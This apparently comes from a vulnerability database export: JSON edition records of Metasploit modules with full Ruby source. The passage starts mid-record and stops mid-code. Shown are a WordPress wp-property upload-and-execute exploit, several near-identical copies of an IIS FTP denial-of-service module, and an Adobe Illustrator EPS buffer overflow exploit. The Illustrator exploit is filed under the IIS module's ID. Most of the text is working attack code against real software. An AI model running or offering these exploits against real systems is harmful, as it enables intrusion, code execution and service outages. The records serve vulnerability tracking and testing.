)\n\n return Exploit::CheckCode::Unknown if res.nil? || res.code != 200\n\n Exploit::CheckCode::Detected\n end\n\n def exploit\n data_uri = normalize_uri(wordpress_url_plugins, 'wp-property', 'third-party', 'uploadify/')\n request_uri = normalize_uri(data_uri, 'uploadify.php')\n\n payload_name = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\")\n data.add_part(data_uri, nil, nil, \"form-data; name=\\\"folder\\\"\")\n post_data = data.to_s\n\n print_status(\"Uploading payload #{payload_name}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => request_uri,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n if res.nil? || res.code != 200 || res.body !~ /#{payload_name}/\n fail_with(Failure::UnexpectedReply, \"#{peer} - Upload failed\")\n end\n\n register_files_for_cleanup(payload_name)\n\n upload_uri = normalize_uri(res.body)\n\n print_status(\"Executing payload #{payload_name}\")\n send_request_raw(\n 'uri' => upload_uri,\n 'method' => 'GET'\n )\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-28T04:58:13", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 82}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-28T07:06:19", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-28T07:06:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-28T07:06:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-28T07:06:19", "differentElements": ["modified", "published"], "edition": 83}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "a8492c8896a6140c62316ed6beef901b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-28T13:13:43", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-28T13:13:43"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-28T13:13:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-28T13:13:43", "differentElements": ["modified", "published"], "edition": 84}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-28T15:00:05", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-28T15:00:05"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-28T15:00:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-28T15:00:05", "differentElements": ["sourceData"], "edition": 85}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "63880e80d9ab8ef7c9ba96cc0415c260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-29T06:56:54", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2019-07-29T06:56:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-29T06:56:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T06:56:54", "differentElements": ["sourceData"], "edition": 86}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-29T09:06:54", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-29T09:06:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-29T09:06:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T09:06:54", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 87}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "f38c7831c6542a2a8592cf00755fb260", "type": "metasploit", "bulletinFamily": "exploit", "title": "Adobe Illustrator CS4 v14.0.0", "description": "Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit\n", "published": "2009-12-07T20:24:12", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4195"], "cvelist": ["CVE-2009-4195"], "lastseen": "2019-07-29T21:02:55", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2019-07-29T21:02:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4195"]}, {"type": "exploitdb", "idList": ["EDB-ID:10344", "EDB-ID:10281", "EDB-ID:16669"]}, {"type": "saint", "idList": ["SAINT:1342B9C187791CDB325189EAE331B859", "SAINT:DAB4774FB8BA41F07B5979481EF06BB5", "SAINT:5D9CF4CFA061EA8B38FDB6D364C80E1D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84556"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_ILLUSTRATOR_V14_EPS"]}, {"type": "nessus", "idList": ["ADOBE_ILLUSTRATOR_APSB10-01.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813493", "OPENVAS:1361412562310813494"]}, {"type": "threatpost", "idList": ["THREATPOST:5455BF44459472376F8AB7DA9D239294"]}], "modified": "2019-07-29T21:02:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Illustrator CS4 v14.0.0',\n 'Description' => %q{\n Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n overlong DSC Comment Buffer Overflow Exploit\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'pyrokinesis', # Of Nine:Situations:Group\n 'dookie'\n ],\n 'References' =>\n [\n [ 'CVE', '2009-4195' ],\n [ 'BID', '37192' ],\n [ 'OSVDB', '60632' ],\n [ 'EDB', '10281' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'DisablePayloadHandler' => 'true',\n 'AllowWin32SEH' => true\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\\x0D\\x0C\\x0A\",\n 'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows Universal', { 'Ret' => 0x4B4B5173 } ], # CALL ESI in icudt36.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Dec 03 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.eps']),\n ])\n end\n\n def exploit\n\n header = \"\\xc5\\xd0\\xd3\\xc6\\x20\\x00\\x00\\x00\\x05\\xc8\\x04\\x00\\x00\\x00\"\n header << \"\\x00\\x00\\x00\\x00\\x00\\x00%\\xc8\\x04\\x00\\xb5I\\x01\\x00\\xff\"\n header << \"\\xff\\x00\\x00\"\n header << \"%!PS-Adobe-3.1\\x20EPSF-3.0\\r\\n\"\n header << \"%ADO_DSC_Encoding:\\x20Windows\\x20Roman\\r\\n\"\n header << \"%\"\n sploit = rand_text_alpha(41699)\n sploit << [target.ret].pack('V')\n sploit << rand_text_alpha(2291)\n sploit << \"%Title:\\x20Untitled-1.eps\\r\\n\"\n sploit << \"%AAAAAAAA\"\n sploit << payload.encoded\n trailer = \": A\\r\\n\"\n trailer << \"%%For:\\x20alias\\r\\n\"\n trailer << \"%%CreationDate:\\x2011/27/2009\\r\\n\"\n trailer += \"%%BoundingBox:\\x200\\x200\\x20227\\x20171\\r\\n\"\n trailer += \"%%HiResBoundingBox:\\x200\\x200\\x20226.5044\\x20170.3165\\r\\n\"\n trailer += \"%%CropBox:\\x200\\x200\\x20226.5044\\x20170.3165\\r\\n\"\n trailer += \"%%LanguageLevel:\\x202\\r\\n\"\n trailer += \"%%DocumentData:\\x20Clean7Bit\\r\\n\"\n trailer += \"%ADOBeginClientInjection:\\x20DocumentHeader\\x20\\\"AI11EPS\\\"\\r\\n\"\n trailer += \"%%AI8_CreatorVersion:\\x2014.0.0\\r\"\n trailer += \"%AI9_PrintingDataBegin\\r\"\n trailer += \"%ADO_BuildNumber:\\x20Adobe\\x20Illustrator(R)\\x2014.0.0\\x20x367\\x20R\\x20agm\\x204.4890\\x20ct\\x205.1541\\r\"\n trailer += \"%ADO_ContainsXMP:\\x20MainFirst\\r\"\n trailer += \"%AI7_Thumbnail:\\x20128\\x2096\\x208\\r\"\n trailer += \"%%BeginData:\\x204096\\x20Hex\\x20Bytes\\r\"\n trailer += 